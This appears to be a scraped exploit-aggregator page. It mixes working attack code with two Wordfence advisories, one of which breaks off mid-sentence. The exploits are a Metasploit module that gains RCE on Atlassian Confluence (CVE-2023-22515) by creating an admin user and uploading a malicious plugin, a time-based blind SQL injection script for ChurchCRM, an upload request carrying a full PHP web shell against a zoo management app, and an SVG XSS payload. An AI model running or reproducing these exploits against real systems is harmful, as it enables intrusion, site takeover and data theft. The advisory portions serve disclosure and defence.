Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Retry include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Confluence Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for Java objects to be modified at run time. The exploit will create a new administrator user and upload a malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-22515'], ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'], ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'], ], 'DisclosureDate' => '2023-10-04', 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default. 'Targets' => [ [ 'Automatic', { 'Platform' => 'java', 'Arch' => [ARCH_JAVA] } ], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], # Note we cannot delete the admin user we create, as Confluence prevents a user deleting themself. 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ # By default Confluence listens for HTTP requests on TCP port 8090. Opt::RPORT(8090), # Confluence may have a non default base path, allow user to configure that here. OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']), # The endpoint we target to trigger the vulnerability. OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']), # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait. OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30]) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT']) ) return CheckCode::Unknown('Connection failed') unless res # Ensure target is a Confluence server by identifying an expected HTTP header. return CheckCode::Unknown('No \'X-Confluence-Request-Time\' header') unless res.headers.key? 'X-Confluence-Request-Time' if res.code == 200 && res.body # Pull out the version string from one of three known locations within the HTML. m = res.body.match(/ajs-version-number" content="(\d+\.\d+\.\d+)"/i) if m.nil? m = res.body.match(/Printed by Atlassian Confluence (\d+\.\d+\.\d+)/i) if m.nil? m = res.body.match(%r{(\d+\.\d+\.\d+)}i) end end unless m.nil? version = Rex::Version.new(m[1]) ranges = [ ['8.0.0', '8.3.2'], ['8.4.0', '8.4.2'], ['8.5.0', '8.5.1'] ] # If we have a Confluence server within the given version ranges, it appears vulnerable. ranges.each do |min, max| if version.between?(Rex::Version.new(min), Rex::Version.new(max)) return Exploit::CheckCode::Appears("Atlassian Confluence #{version}") end end # By here we know we have a confluence server, but the version found indicates it is safe. return Exploit::CheckCode::Safe("Atlassian Confluence #{version}") end end # By here we have identified a Confluence server, but could not get the version number to determine if it is # vulnerable of not. CheckCode::Detected end def exploit target_endpoint = normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT']) print_status("Setting the application configuration's setupComplete to false via endpoint: #{target_endpoint}") # 1. Leverage CVE-2023-22515 to modify a configuration setting, allowing us to reach the /setup/* endpoints. res = send_request_cgi( 'method' => 'POST', 'uri' => target_endpoint, 'vars_post' => { 'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false' } ) unless res&.code == 302 || res&.code == 200 fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}") end print_status('Creating a new administrator user account...') # usernames must be lowercase admin_username = rand_text_alpha_lower(8) admin_password = rand_text_alphanumeric(8) # 2. Create a new administrator user account. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' }, 'vars_post' => { 'username' => admin_username, 'fullName' => rand_text_alphanumeric(8), # The email address does not need to be a valid address, but it must contain an @ character. 'email' => "#{rand_text_alphanumeric(8)}@#{rand_text_alphanumeric(8)}", 'password' => admin_password, 'confirm' => admin_password, 'setup-next-button' => 'Next' } ) unless res&.code == 302 || res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action') end print_status("Created #{admin_username}:#{admin_password}") # 3. Force the setup to become completed, to allow normal Confluence operations to continue. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' } ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action') end print_status('Adding a malicious plugin...') # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token. res = send_request_cgi( 'method' => 'GET', # Note, we concatenate '/' as this is required by the endpoint. 'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/', 'headers' => { 'Authorization' => basic_auth(admin_username, admin_password), 'Accept' => '*/*' }, 'vars_get' => { 'os_authType' => 'basic' } ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/') end upm_token = res.headers['upm-token'] unless upm_token fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/') end begin payload_endpoint = rand_text_alphanumeric(8) plugin_key = rand_text_alpha(8) # 5. Construct a malicious Servlet plugin JAR file. We set :random to true which will randomize the string # 'metasploit' in the class paths (via Rex::Zip::Jar::add_sub). jar = payload.encoded_jar(random: true) jar.add_file( 'atlassian-plugin.xml', %( <atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2"> <plugin-info> <description>#{rand_text_alphanumeric(8)}</description> <version>#{rand(1024)}.#{rand(1024)}</version> </plugin-info> <servlet key="#{rand_text_alpha(8)}" class="#{jar.substitutions['metasploit']}.PayloadServlet"> <url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern> </servlet> </atlassian-plugin>) ) jar.add_file('metasploit/PayloadServlet.class', MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')) message = Rex::MIME::Message.new message.add_part(jar.pack, 'application/octet-stream', 'binary', "form-data; name=\"plugin\"; filename=\"#{rand_text_alphanumeric(8)}.jar\"") # 6. Upload the malicious plugin. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/', 'ctype' => 'multipart/form-data; boundary=' + message.bound, 'headers' => { 'Authorization' => basic_auth(admin_username, admin_password), 'Accept' => '*/*' }, 'vars_get' => { 'token' => upm_token }, 'data' => message.to_s ) unless res&.code == 202 fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply code from endpoint: /rest/plugins/1.0/') end unless res.body =~ %r{<textarea>(.+)</textarea>} fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply data from endpoint: /rest/plugins/1.0/') end begin plugin_json = JSON.parse(::Regexp.last_match(1)) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, failed to parse JSON data from endpoint: /rest/plugins/1.0/') end # We receive a JSON object like this: # <textarea>{"type":"INSTALL","pingAfter":100,"status":{"done":false,"statusCode":200,"contentType":"application/vnd.atl.plugins.install.installing+json","source":"JQEjEJBr.jar","name":"JQEjEJBr.jar"},"links":{"self":"/rest/plugins/1.0/pending/52227753-1c3e-496f-a4f4-d52a8b3850dc","alternate":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc"},"timestamp":1697471602188,"userKey":"4028d6b28b294680018b39311d17001e","id":"52227753-1c3e-496f-a4f4-d52a8b3850dc"}</textarea> links_alternate = plugin_json&.dig('links', 'alternate') if links_alternate.nil? fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, no alternate link in reply from endpoint: /rest/plugins/1.0/') end print_status('Waiting for plugin to be installed...') # 7. The plugin is installed asynchronously, so we poll the server for installation to be completed. plugin_ready = retry_until_truthy(timeout: datastore['CONFLUENCE_PLUGIN_TIMEOUT']) do res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, links_alternate) ) # We receive a JSON result to indicate if the plugin is finished installing. # {"links":{"self":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc","result":"/rest/plugins/1.0/plkWITNH-key"},"done":true,"type":"INSTALL","progress":1.0,"pollDelay":100,"timestamp":1697471602188} if res&.code == 200 begin res_json = JSON.parse(res.body) next res_json['done'] rescue JSON::ParserError next false end end false end unless plugin_ready fail_with(Failure::TimeoutExpired, 'Uploading plugin failed, timeout while waiting to install.') end print_status('Triggering payload...') # 8. Trigger the payload by performing a request to the malicious servlet endpoint. res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'plugins', 'servlet', payload_endpoint) ) unless res&.code == 200 fail_with(Failure::PayloadFailed, "Triggering payload failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}") end ensure print_status('Deleting plugin...') # 9. Delete the plugin we uploaded as we no longer need it. We cannot delete the admin user we created as # Confluence doesnt allow a user to delete themself. res = send_request_cgi( 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0', "#{plugin_key}-key"), 'headers' => { 'Authorization' => basic_auth(admin_username, admin_password), 'Connection' => 'close' } ) unless res&.code == 204 print_warning("Deleting plugin failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}") end end end end </code></pre>

<pre><code>Today, on October 13, 2023, the Wordfence Threat Intelligence Team became aware of a vulnerability that was recently patched in Royal Elementor Addons and Templates, a WordPress plugin installed on over 200,000 sites, that makes it possible for unauthenticated attackers to upload arbitrary files to vulnerable sites. This allows unauthenticated attackers to upload PHP files containing malicious content, such as a backdoor, that makes remote code execution possible and leads to a complete compromise of the site. We have blocked over 46,169 attacks targeting this vulnerability in the past 30 days, and reviewing our data revealed that attacks started on or around August 30th, 2023, though we also have evidence that the exploit was being actively developed as early as July 27, 2023. All Wordfence users running Premium, Care, or Response, as well as those still running the free version of the Wordfence plugin, are protected by the Wordfence firewall’s built in malicious file upload protection. However, we still strongly encourage users to ensure their sites are updated to the latest patched version of the plugin which is 1.3.79 due to the fact that this vulnerability is being actively exploited. This vulnerability was originally discovered by Fioravante Souza from WPScan, and you can find all applicable references in the Wordfence Intelligence Database. Description: Royal Elementor Addons and Templates <= 1.3.78 – Unauthenticated Arbitrary File Upload Affected Plugin: Royal Elementor Addons and Templates Plugin slug: royal-elementor-addons Vendor: WP Royal Affected versions: <= 1.3.78 CVE ID: CVE-2023-5360 CVSS Score: 9.8 (Critical) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Researcher: Fioravante Souza(WPScan) Fully Patched Version: 1.3.79 Wordfence Intelligence Reference The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.3.78. This is due to insufficient file type validation in the handle_file_upload() function called via AJAX which allows attackers to supply a preferred filetype extension to the ‘allowed_file_types‘ parameter, with a special character, which makes it possible for the uploaded file to bypass their filter list. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Due to the fact that this vulnerability is being actively exploited, we are keeping information about the technical specifications of this vulnerability limited. Indicators of Compromise Our earliest indicator that this vulnerability was targeted was on August 30th, well before the vulnerability was patched, however, we only see a few attacks here and there around the early days with attacks starting to ramp up later around October 3rd, 2023. In the past 30 days, we have blocked over 46,169 attacks. A majority of the attacks appear to be coming from just the following three IP Addresses: - 65.21.22.78 with 33,255 attacks blocked. - 2a01:4f9:3080:4eea::2 with 12,289 attacks blocked. - 135.181.181.50 with 206 attacks blocked. >From our data, it appears that attackers have been attempting to place files named b1ack[.]p$hp, which has an md5 hash of 1635f34d9c1da30ff5438e06d3ea6590 and can be used to place additional PHP files on the site, as well as wp.ph$p which has an md5 hash of bac83f216eba23a865c591dbea427f22 and inserts a malicious administrator. The Wordfence scanner has had detection for b1ack[.]p$hp since December 2019, and we have written a signature to detect wp[.]ph$p which will be released as soon as it passes our quality assurance process. b1ack[.]p$hp contains the following code: ray-so-export (6) wp[.]ph$p contains the following code: ray-so-export (7) We recommend all site owners run a malware scan using Wordfence CLI, with the commercial signature set, or the Wordfence plugin, if utilizing the Royal Elementor Addons and Templates plugin to ensure their site has not been compromised as a result of this vulnerability. If you believe your site has been compromised as a result of this vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance. Conclusion In today’s post, we detailed attacks against a critical unauthenticated arbitrary file upload vulnerability in the Royal Elementor Addons and Templates plugin for WordPress that has been patched, but is actively being exploited. This vulnerability can be leveraged to upload a malicious PHP file that will make remote code execution on the server possible. As a reminder, all Wordfence users running Premium, Care, or Response, as well as those still running the free version of the Wordfence plugin, are protected by the Wordfence firewall’s built in malicious file upload protection. However, we still strongly encourage users to ensure their sites are updated to the latest patched version of the plugin which is 1.3.79 due to the fact that this vulnerability is being actively exploited. If you know someone who uses this plugin, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk. For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard. Special thanks to Ramuel Gall, Wordfence Senior Security Researcher, for assistance researching this vulnerability, analyzing the attack data, and ensuring our users have adequate protection and detection coverage. </code></pre>

<pre><code># Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid # Date: 03-05-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md # Software Link: https://github.com/ChurchCRM/CRM/releases # Vendor Homepage: http://churchcrm.io/ # Version: 4.5.4 # Tested on: Windows, Linux # CVE: CVE-2023-29842 """ The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter. This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. This script is created as Proof of Concept to retrieve the database name and version. """ import sys, requests def injection(target, inj_str, session_cookies): for j in range(32, 126): url = "%s/EditEventTypes.php" % (target) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j))) r = requests.post(url, headers=headers, data=data) res = r.text if (r.elapsed.total_seconds () > 2 ): return j return None def retrieveDBName(session_cookies): db_name = "" print("(+) Retrieving database name, please wait") for i in range (1,100): injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): sys.stdout.write(chr(retrieved_value)) sys.stdout.flush() else: break def retrieveDBVersion(session_cookies): db_version = "" print("(+) Retrieving database version, please wait") for i in range (1,100): injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): sys.stdout.write(chr(retrieved_value)) sys.stdout.flush() else: break def login(target, username, password): target = "%s/session/begin" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "User=%s&Password=%s" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") retrieveDBName(session_cookies) print("") retrieveDBVersion(session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main() </code></pre>

<pre><code># Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE # Date: 16.10.2023 # Exploit Author: Çağatay Ceyhan # Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette # Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database # Version: 1.0 # Tested on: Windows 11 ## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication. POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1 Host: localhost Content-Length: 6162 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="animal_id" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_given_name" kdkd ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_species_name" ıdsıd ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_dob" 1552-02-05 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_gender" m ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_avg_lifespan" 3 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="class_id" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="location_id" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_dietary_req" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_natural_habitat" faad ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_pop_dist" eterter ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_joindate" 5559-02-06 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_height" 2 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_weight" 3 ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_description" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="images[]"; filename="ultra.php" Content-Type: application/octet-stream <?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Web Shell</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box; } body { font-family: sans-serif; color: rgba(0, 0, 0, .75); } main { margin: auto; max-width: 850px; } pre, input, button { padding: 10px; border-radius: 5px; background-color: #efefef; } label { display: block; } input { width: 100%; background-color: #efefef; border: 2px solid transparent; } input:focus { outline: none; background: transparent; border: 2px solid #e6e6e6; } button { border: none; cursor: pointer; margin-left: 5px; } button:hover { background-color: #e6e6e6; } .form-group { display: -webkit-box; display: -ms-flexbox; display: flex; padding: 15px 0; } </style> </head> <body> <main> <h1>Web Shell</h1> <h2>Execute a command</h2> <form method="post"> <label for="cmd">Command</label> <div class="form-group"> <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required> <button type="submit">Execute</button> </div> </form> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?> <h2>Output</h2> <?php if (isset($cmd)): ?> <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre> <?php else: ?> <pre>No result.</pre> <?php endif; ?> <?php endif; ?> </main> </body> </html> ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_med_record" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_transfer" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_transfer_reason" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_death_date" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_death_cause" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="an_incineration" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_gest_period" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_category" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="m_avg_body_temp" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_nest_const" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_clutch_size" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_wingspan" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="b_color_variant" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_body_temp" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_water_type" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="f_color_variant" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="rep_type" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="clutch_size" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="num_offspring" ------WebKitFormBoundary8NY8zT5dXIloiUML Content-Disposition: form-data; name="submit" ------WebKitFormBoundary8NY8zT5dXIloiUML-- ## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php. </code></pre>

<pre><code>## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction ## Author: nu11secur1ty ## Date: 10/14/2023 ## Vendor: https://smart-school.in/ ## Software: https://demo.smart-school.in/site/userlogin# ## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected ## Description: The user can manipulate the system by injecting an HTML code into the system without any restriction. The function apply_leave is not sanitizing correctly. This could allow the user to inject this application by using HTML or Java Script with very malicious purposes etc... STATUS: HIGH- Vulnerability [+]Exploit: ```HTML POST /user/apply_leave/add HTTP/1.1 Host: demo.smart-school.in Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9 Content-Length: 1492 Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5wuzslDN9siOCW0K X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.smart-school.in Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.smart-school.in/user/apply_leave Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="homework_id" ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="apply_date" 10/14/2023 ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="from_date" 09/27/2023 ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="to_date" 09/29/2023 ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="leave_id" ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="message" <a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank" rel="noopener nofollow ugc"> <img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif" style="border:1px solid black;max-width:100%;" alt="Photo of Byron Bay, one of Australia's best beaches!"> ------WebKitFormBoundary5wuzslDN9siOCW0K Content-Disposition: form-data; name="files[]"; filename="kurec.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> ------WebKitFormBoundary5wuzslDN9siOCW0K-- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html) ## Time spent: 00:37:00 </code></pre>

<pre><code>The newest WordPress patch includes fixes for 8 Medium-Severity security issues, several of which are trivial to exploit. WordPress Core 6.3.2 was released today, on October 12, 2023. It includes a number of security fixes and additional hardening against commonly exploited vulnerabilities. While all of the vulnerabilities are of Medium severity, several of them are impactful enough to potentially allow site takeover, and thus the 6.3.2 update has the most significant security fixes we’ve seen in a while. Many of these patches have been backported to every version of WordPress since 4.1, with just a few being backported to the major version in which the functionality was released. WordPress has supported automatic core updates for security releases since WordPress 3.7, and the vast majority of WordPress sites should receive a patch for their major version of WordPress automatically over the next 24 hours. We recommend verifying that your site has been automatically updated to one of the patched versions. Patched versions are available for every major version of WordPress since 4.1, so you can update without risking compatibility issues. The Wordfence Threat Intelligence Team released two new firewall rules today to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers against the most impactful vulnerabilities patched, and these rules will be available to free Wordfence users in 30 days, on November 11th, 2023. If your site has not been updated automatically we strongly recommend updating manually as soon as possible, as one of the vulnerabilities patched in this release can be used by an attacker with a low-privileged contributor-level account to take over a site. Technical Analysis and Overview As with every WordPress core release containing security fixes, the Wordfence Threat Intelligence team analyzed the code changes in detail to evaluate the impact of these vulnerabilities on our customers, and to ensure our customers remain protected. No More ShortCode Abuse Description: WordPress Core <= 6.3.1 – Authenticated (Subscriber+) Arbitrary Shortcode Execution Affected Versions: WordPress Core < 6.3.2 Researcher: James Golovich & WhiteCyberSec CVE ID: Pending CVSS Score: 5.4(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N Fully Patched Version: 6.3.2 Wordfence Intelligence Reference WordPress Core is vulnerable to arbitrary shortcode execution in versions up to, and including, 6.3.1 due to a lack of input validation on the ‘shortcode’ parameter in the parse_media_shortcode AJAX function. This allows authenticated attackers, with subscriber-level privileges and above, to execute arbitrary shortcodes. While this patch does not address a specific vulnerability, it blocks a common vector that enables attackers to exploit vulnerabilities that use shortcodes. Before WordPress 6.3.2, any authenticated user, including subscribers could execute any shortcode by calling the built-in ‘parse-media-shortcode’ AJAX handler. The changeset in WordPress 6.3.2 restricts this AJAX handler to media shortcodes, and requires the ’embed’ shortcode to be associated with an active post ID that the user can access. This means that a large range of SQL Injection, Sensitive Information Disclosure, and Remote Code Execution vulnerabilities that required only an active user login can now only be exploited by Contributor-level users or above. You can find several of the shortcode-based vulnerabilities we reference by searching the Wordfence Intelligence vulnerability database. Previously our team could not add a firewall rule to prevent the execution of arbitrary shortcodes due to the varying use cases. Fortunately, with this patch and change, the expected behavior of the parse-media-shortcode action has been restricted by WordPress Core, so we were able to create a generic firewall rule that will prevent arbitrary execution of shortcodes that are not in the allowlist from the function. Wordfence Premium, Care, and Response customers received this rule today, while those still on the free version of Wordfence will receive this rule after a 30 day delay on November 11th, 2023. Reflected Cross-Site Scripting via Application Passwords Description: WordPress Core 5.6-6.3.1 – Reflected Cross-Site Scripting via Application Password Requests Affected Versions: WordPress Core < 6.3.2 Researcher: mascara7784 CVE ID: Pending CVSS Score: 6.1(Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Fully 